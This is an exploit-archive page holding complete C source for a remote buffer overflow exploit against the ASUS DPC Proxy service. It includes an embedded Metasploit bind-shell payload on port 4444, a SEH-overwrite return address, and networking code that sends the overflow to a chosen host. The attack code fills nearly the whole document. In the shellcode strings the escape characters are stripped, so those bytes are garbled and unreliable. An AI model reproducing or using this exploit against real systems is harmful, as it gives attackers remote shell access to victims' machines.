[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : ASUS DPC Proxy 2.0.0.16/19 Remote Buffer Overflow Exploit
# Published : 2008-05-29
# Author : Heretic2
# Previous Title : Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python)
# Next Title : Now SMS/MMS Gateway 5.5 Remote Buffer Overflow Exploit
/* Dreatica-FXP crew
*
* ----------------------------------------
* Target : ASUS DPC Proxy 2.0.0.16/2.0.0.24
* ----------------------------------------
* Exploit : ASUS DPC Proxy 2.0.0.16/2.0.0.19 Remote Buffer Overflow Exploit
* Exploit date : 02.04.2008
* Exploit writer : Heretic2 (heretic2x@gmail.com)
* OS : Windows ALL
* Crew : Dreatica-FXP
* Location : http://www.milw0rm.com/
* ----------------------------------------
* Info : Sending long buufer(however the buffer should be send by chunks)
* we obtain a SEH exploitation, due to server bytes stricts i decided
* to use here a alphanumeric shellcodes and jumps.
* ----------------------------------------
* Thanks to:
* 1. Luigi Auriemma ( http://aluigi.org <aluigi [at] autistici.org> )
* 2. The Metasploit project ( http://metasploit.com )
* 3. ALPHA 2: Zero-tolerance ( <skylined [at] edup.tudelft.nl> )
* 4. Dreatica-FXP crew ( )
************************************************************************************
* This was written for educational purpose only. Use it at your own risk. Author will be not be
* responsible for any damage, caused by that code.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#include <time.h>
#pragma comment(lib,"ws2_32")
void usage(char * s);
void logo();
void end_logo();
void print_info_banner_line(const char * key, const char * val);
void extract_ip_and_port( char * &remotehost, int * port, char * str);
int fill_payload_args(int sh, int bport, char * reverseip, int reverseport, struct h2readyp * xx);
int hr2_connect(char * remotehost, int port, int timeout);
int hr2_udpconnect(char * remotehost, int port, struct sockaddr_in * addr, int timeout);
int hr2_updsend(char * remotehost, unsigned char * buf, unsigned int len, int port, struct sockaddr_in * addr, int timeout);
int execute(struct _buf * abuf, char * remotehost, int port);
struct _buf
{
unsigned char * ptr;
unsigned int size;
};
int construct_shellcode(int sh, struct _buf * shf, int target);
int construct_buffer(struct _buf * shf, int target, struct _buf * abuf);
// -----------------------------------------------------------------
// XGetopt.cpp Version 1.2
// -----------------------------------------------------------------
int getopt(int argc, char *argv[], char *optstring);
char *optarg; // global argument pointer
int optind = 0, opterr; // global argv index
// -----------------------------------------------------------------
// -----------------------------------------------------------------
struct {
const char * name;
int length;
char *shellcode;
}shellcodes[]={
{ "BindShell on 4444",
/*
* windows/shell_bind_tcp - 696 bytes
* http://www.metasploit.com
* Encoder: x86/alpha_mixed
* EXITFUNC=seh, LPORT=4444
*/
696,
"x89xe6xdbxddxd9x76xf4x5ex56x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x4bx4cx43x5ax4ax4bx50x4dx4dx38x4ax59x4bx4fx4b"
"x4fx4bx4fx43x50x4cx4bx42x4cx51x34x47x54x4cx4b"
"x51x55x47x4cx4cx4bx43x4cx43x35x42x58x45x51x4a"
"x4fx4cx4bx50x4fx44x58x4cx4bx51x4fx51x30x45x51"
"x4ax4bx47x39x4cx4bx46x54x4cx4bx43x31x4ax4ex50"
"x31x49x50x4ax39x4ex4cx4bx34x49x50x43x44x43x37"
"x49x51x48x4ax44x4dx43x31x49x52x4ax4bx4bx44x47"
"x4bx46x34x47x54x47x58x42x55x4bx55x4cx4bx51x4f"
"x51x34x43x31x4ax4bx43x56x4cx4bx44x4cx50x4bx4c"
"x4bx51x4fx45x4cx45x51x4ax4bx43x33x46x4cx4cx4b"
"x4cx49x42x4cx46x44x45x4cx43x51x48x43x46x51x49"
"x4bx42x44x4cx4bx51x53x50x30x4cx4bx51x50x44x4c"
"x4cx4bx44x30x45x4cx4ex4dx4cx4bx51x50x44x48x51"
"x4ex45x38x4cx4ex50x4ex44x4ex4ax4cx50x50x4bx4f"
"x4ex36x42x46x51x43x45x36x42x48x50x33x47x42x45"
"x38x44x37x44x33x47x42x51x4fx50x54x4bx4fx48x50"
"x42x48x48x4bx4ax4dx4bx4cx47x4bx46x30x4bx4fx49"
"x46x51x4fx4dx59x4dx35x43x56x4bx31x4ax4dx45x58"
"x45x52x46x35x42x4ax44x42x4bx4fx48x50x43x58x4e"
"x39x44x49x4bx45x4ex4dx50x57x4bx4fx4ex36x46x33"
"x46x33x51x43x51x43x50x53x47x33x46x33x47x33x46"
"x33x4bx4fx48x50x43x56x42x48x42x31x51x4cx45x36"
"x51x43x4bx39x4dx31x4ax35x43x58x4ex44x44x5ax42"
"x50x48x47x46x37x4bx4fx48x56x42x4ax42x30x50x51"
"x50x55x4bx4fx4ex30x45x38x49x34x4ex4dx46x4ex4a"
"x49x51x47x4bx4fx4ex36x51x43x50x55x4bx4fx4ex30"
"x42x48x4ax45x51x59x4dx56x47x39x50x57x4bx4fx4e"
"x36x50x50x46x34x50x54x46x35x4bx4fx48x50x4cx53"
"x43x58x4bx57x42x59x49x56x42x59x50x57x4bx4fx48"
"x56x51x45x4bx4fx4ex30x43x56x43x5ax43x54x42x46"
"x43x58x45x33x42x4dx4bx39x4dx35x42x4ax46x30x51"
"x49x51x39x48x4cx4cx49x4dx37x43x5ax50x44x4cx49"
"x4ax42x46x51x49x50x4cx33x4ex4ax4bx4ex50x42x46"
"x4dx4bx4ex47x32x46x4cx4ax33x4cx4dx43x4ax50x38"
"x4ex4bx4ex4bx4ex4bx43x58x43x42x4bx4ex48x33x42"
"x36x4bx4fx42x55x47x34x4bx4fx48x56x51x4bx46x37"
"x51x42x50x51x50x51x50x51x42x4ax45x51x46x31x50"
"x51x46x35x50x51x4bx4fx48x50x45x38x4ex4dx4ex39"
"x43x35x48x4ex50x53x4bx4fx4ex36x43x5ax4bx4fx4b"
"x4fx47x47x4bx4fx48x50x4cx4bx51x47x4bx4cx4cx43"
"x49x54x42x44x4bx4fx48x56x51x42x4bx4fx4ex30x42"
"x48x4cx30x4cx4ax44x44x51x4fx50x53x4bx4fx48x56"
"x4bx4fx48x50x41x41"
},
{NULL, 0, NULL}
};
struct _target{
const char *t ;
unsigned long ret ;
} targets[]=
{
{"ASUS DpcProxy 2.0.0.16/2.0.0.19", 0x0040273b },
{"DOS/Crash/Debug/Test/Fun", 0x00400101 },
{NULL, 0x00000000 }
};
// memory for buffers
unsigned char payloadbuffer[10000], a_buffer[10000];
long dwTimeout=5000;
int timeout=5000;
int main(int argc, char **argv)
{
char c,*remotehost=NULL,*file=NULL,*reverseip=NULL,*url=NULL,temp1[100];
int sh,port=623,itarget=0;
struct _buf fshellcode, sbuffer;
logo();
if(argc<2)
{
usage(argv[0]);
return -1;
}
WSADATA wsa;
WSAStartup(MAKEWORD(2,0), &wsa);
// set defaults
sh=0;
// ------------
while((c = getopt(argc, argv, "h:t:R:T:"))!= EOF)
{
switch (c)
{
case 'h':
if (strchr(optarg,':')==NULL)
{
remotehost=optarg;
}else
{
sscanf(strchr(optarg,':')+1, "%d", &port);
remotehost=optarg;
*(strchr(remotehost,':'))='�';
}
break;
case 't':
sscanf(optarg, "%d", &itarget);
itarget--;
break;
case 'T':
sscanf(optarg, "%ld", &dwTimeout);
break;
default:
usage(argv[0]);
WSACleanup();
return -1;
}
}
if(remotehost == NULL)
{
printf(" [-] Please enter remotehostn");
end_logo();
WSACleanup();
return -1;
}
print_info_banner_line("Host", remotehost);
sprintf(temp1, "%d", port);
print_info_banner_line("Port", temp1);
print_info_banner_line("Payload", shellcodes[sh].name);
if(sh==0)
{
sprintf(temp1, "%d", 4444);
print_info_banner_line("BINDPort", temp1);
}
printf(" # ------------------------------------------------------------------- # n");
fflush(stdout);
memset(payloadbuffer, 0, sizeof(payloadbuffer));
fshellcode.ptr=payloadbuffer;
fshellcode.size=0;
memset(a_buffer, 0, sizeof(a_buffer));
sbuffer.ptr=a_buffer;
sbuffer.size=0;
if(!construct_shellcode(sh, &fshellcode, itarget))
{
end_logo();
WSACleanup();
return -1;
}
printf(" [+] Payload constructedn");
if(!construct_buffer(&fshellcode, itarget, &sbuffer))
{
printf(" [-] Buffer not constructedn");
end_logo();
WSACleanup();
return -1;
}
printf(" [+] Final buffer constructedn");
if(!execute(&sbuffer, remotehost, port))
{
printf(" [-] Buffer not sentn");
end_logo();
WSACleanup();
return -1;
}
printf(" [+] Buffer sentn");
end_logo();
WSACleanup();
return 0;
}
int construct_shellcode(int sh, struct _buf * shf, int target)
{
memcpy(shf->ptr, shellcodes[sh].shellcode, shellcodes[sh].length);
shf->size=shellcodes[sh].length;
return 1;
}
char JMPX[] =
// get ecx
"x89xE6xDBxDDxD9x76xF4x59"
// alphanum-decoder
"x49x49x49"
"x49x49x49x49x49x49x49x49x49x49x49x37x51x5ax6ax41"
"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42x42"
"x30x42x42x41x42x58x50x38x41x42x75x4ax49"
// encoded jump
"x59x6fx7ax47x41"
// back jump
"x89xE6xDBxDDxD9x76xF4x5fx81xefxf8x1ax00x00xebxb3";
int construct_buffer(struct _buf * shf, int target, struct _buf * sbuf)
{
unsigned char * cp = sbuf->ptr;
memset(cp, 'A', 1000);
cp+=20;
memcpy(cp, shf->ptr, shf->size);
cp+=1000-20;
memset(cp, 'B', 1000);
cp+=1000;
memset(cp, 'C', 1000);
cp+=1000;
memset(cp, 'D', 1000);
cp+=1000;
memset(cp, 'E', 1000);
cp+=1000;
memset(cp, 'F', 1000);
cp+=1000;
memset(cp, 'G', 1000-62-sizeof(JMPX)+1);
cp+=1000-62-sizeof(JMPX)+1;
// code to jump back
memcpy(cp, JMPX,sizeof(JMPX)-1);
cp+=sizeof(JMPX)-1;
// next SEH record and back jump
*cp++='x90';
*cp++='x90';
*cp++='xeb';
*cp++='xec';
// replace SEH
*cp++ = (char)((targets[target].ret ) & 0xff);
*cp++ = (char)((targets[target].ret >> 8) & 0xff);
*cp++ = (char)((targets[target].ret >> 16) & 0xff);
*cp++ = (char)((targets[target].ret >> 24) & 0xff);
memset(cp, 'H', 1000);
cp+=1000;
sbuf->size=(int)(cp-sbuf->ptr);
return 1;
}
void extract_ip_and_port( char * &remotehost, int * port, char * str)
{
if (strchr(str,':')==NULL)
{
remotehost=str;
}else
{
sscanf(strchr(str,':')+1, "%d", port);
remotehost=str;
*(strchr(remotehost,':'))='�';
}
}
int hr2_connect(char * remotehost, int port, int timeout)
{
SOCKET s;
struct hostent *host;
struct sockaddr_in addr;
TIMEVAL stTime;
TIMEVAL *pstTime = NULL;
fd_set x;
int res;
if (INFINITE != timeout)
{
stTime.tv_sec = timeout / 1000;
stTime.tv_usec = timeout % 1000;
pstTime = &stTime;
}
host = gethostbyname(remotehost);
if (!host) return SOCKET_ERROR;
addr.sin_addr = *(struct in_addr*)host->h_addr;
addr.sin_port = htons(port);
addr.sin_family = AF_INET;
s = socket(AF_INET, SOCK_STREAM, 0);
if (s == SOCKET_ERROR)
{
closesocket(s);
return SOCKET_ERROR;
}
unsigned long l = 1;
ioctlsocket( s, FIONBIO, &l ) ;
connect(s, (struct sockaddr*)&addr, sizeof(addr));
FD_ZERO(&x);
FD_SET(s, &x);
res = select(NULL,NULL,&x,NULL,pstTime);
if(res< 0) return SOCKET_ERROR;
if(res==0) return 0;
return (int)s;
}
int hr2_tcpsend(SOCKET s, unsigned char * buf, unsigned int len, int timeout)
{
return send(s, (char *)buf, len, 0);
}
int hr2_tcprecv(SOCKET s, unsigned char * buf, unsigned int len, int timeout)
{
TIMEVAL stTime;
TIMEVAL *pstTime = NULL;
fd_set xy;
int res;
if (INFINITE != timeout)
{
stTime.tv_sec = timeout / 1000;
stTime.tv_usec = timeout % 1000;
pstTime = &stTime;
}
FD_ZERO(&xy);
FD_SET(s, &xy);
res = select(NULL,&xy,NULL,NULL,pstTime);
if(res==0) return 0;
if(res<0) return -1;
return recv(s, (char *)buf, len, 0);
}
int execute(struct _buf * abuf, char * remotehost, int port)
{
int x;
SOCKET s ;
unsigned char rbuf[7000];
unsigned int i;
int rsize=7000;
s = hr2_connect(remotehost, port, 10000);
if(s==0)
{
printf(" [-] connect() timeoutn");
return 0;
}
if(s==SOCKET_ERROR)
{
printf(" [-] Connection failedn");
return 0;
}
x = hr2_tcprecv(s, rbuf, 5000, 10000);
x = hr2_tcprecv(s, rbuf, 5000, 10000);
for(i=0;i<abuf->size/1000;i++)
{
printf(" [+] Chunk %d/%d sentn", i+1,abuf->size/1000);
x = hr2_tcpsend(s, abuf->ptr+1000*i, 1000, 0);
if(x<1000) return -1;
Sleep(1000);
x = hr2_tcprecv(s, rbuf, 5000, 10000);
}
return 1;
}
// -----------------------------------------------------------------
// XGetopt.cpp Version 1.2
// -----------------------------------------------------------------
int getopt(int argc, char *argv[], char *optstring)
{
static char *next = NULL;
if (optind == 0)
next = NULL;
optarg = NULL;
if (next == NULL || *next == '�')
{
if (optind == 0)
optind++;
if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '�')
{
optarg = NULL;
if (optind < argc)
optarg = argv[optind];
return EOF;
}
if (strcmp(argv[optind], "--") == 0)
{
optind++;
optarg = NULL;
if (optind < argc)
optarg = argv[optind];
return EOF;
}
next = argv[optind];
next++; // skip past -
optind++;
}
char c = *next++;
char *cp = strchr(optstring, c);
if (cp == NULL || c == ':')
return '?';
cp++;
if (*cp == ':')
{
if (*next != '�')
{
optarg = next;
next = NULL;
}
else if (optind < argc)
{
optarg = argv[optind];
optind++;
}
else
{
return '?';
}
}
return c;
}
// -----------------------------------------------------------------
// -----------------------------------------------------------------
// -----------------------------------------------------------------
void print_info_banner_line(const char * key, const char * val)
{
char temp1[100], temp2[100];
memset(temp1,0,sizeof(temp1));
memset(temp1, 'x20' , 58 - strlen(val) -1);
memset(temp2,0,sizeof(temp2));
memset(temp2, 'x20' , 8 - strlen(key));
printf(" # %s%s: %s%s# n", key, temp2, val, temp1);
}
void usage(char * s)
{
int j;
printf("n");
printf(" Usage: %s -h <host:port> -t <target>n", s);
printf(" -------------------------------------------------------------------n");
printf(" Arguments:n");
printf(" -h ........ host to attack, default port: 623n");
printf(" -t ........ target to usen");
printf(" -T ........ socket timeoutn");
printf("n");
printf(" Supported ASUS DPCProxy versions:n");
for(j=0; targets[j].t!=0;j++)
{
printf(" %d. %sn",j+1, targets[j].t);
}
printf("n");
for(j=0; shellcodes[j].name!=0;j++)
{
printf(" %d. %sn",j+1, shellcodes[j].name);
}
end_logo();
}
void logo()
{
printf("nn");
printf(" ####################################################################### n");
printf(" # ____ __ _ ______ __ _____ #n");
printf(" # / __ \________ _____/ /_(_)_________ / __/\ \/ / / _ / #n");
printf(" # / / / / ___/ _ \/ __ / __/ / ___/ __ / ___ / / \ / / // / #n");
printf(" # / /_/ / / / ___/ /_// /_/ / /__/ /_// /__/ / _/ / \ / ___/ #n");
printf(" # /_____/_/ \___/ \_,_/\__/_/\___/\__,_/ /_/ /_/\_\/_/ #n");
printf(" # crew #n");
printf(" ####################################################################### n");
printf(" # Exploit : ASUS DPCPROXY Service 2.0.0.16-19 # n");
printf(" # Author : Heretic2 (http://www.dreatica.cl/) # n");
printf(" # Version : 1.0 # n");
printf(" # System : Windows ALL # n");
printf(" # Date : 02.04.2008 - 04.04.2008 # n");
printf(" # ------------------------------------------------------------------- # n");
}
void end_logo()
{
printf(" # ------------------------------------------------------------------- # n");
printf(" # Dreatica-FXP crew [Heretic2] # n");
printf(" ####################################################################### nn");
}
// www.Syue.com [2008-05-29]